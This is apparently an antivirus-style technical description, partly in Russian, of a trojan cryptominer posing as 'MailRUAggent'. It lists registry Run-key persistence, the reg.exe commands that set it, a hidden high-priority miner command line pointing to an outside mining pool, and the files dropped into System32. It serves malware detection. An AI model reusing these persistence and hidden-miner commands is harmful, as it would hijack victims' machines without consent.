Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'MailRUAggent' = '<SYSTEM32>\start.bat'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MailRUAggent' = '<SYSTEM32>\start.bat'
- '<SYSTEM32>\hstart.exe' /NOCONSOLE /HIGH "<SYSTEM32>\MailRUaggent.exe -a scrypt -t 4 -o stratum+tcp://aikapool.com:7938 -u vasyamainer.dasha -p 123sheka"
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MailRUAggent" /t REG_SZ /d "<SYSTEM32>\start.bat" /f
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\start.bat" "
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\auto.bat" "
- '<SYSTEM32>\reg.exe' Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MailRUAggent" /t REG_SZ /d "<SYSTEM32>\start.bat" /f
- <SYSTEM32>\MailRUaggent.exe
- <SYSTEM32>\libwinpthread-1.dll
- <SYSTEM32>\start.bat
- <SYSTEM32>\pthreadGC2.dll
- <SYSTEM32>\auto.bat
- <SYSTEM32>\zlib1.dll
- <SYSTEM32>\libcurl-4.dll
- <SYSTEM32>\hstart.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''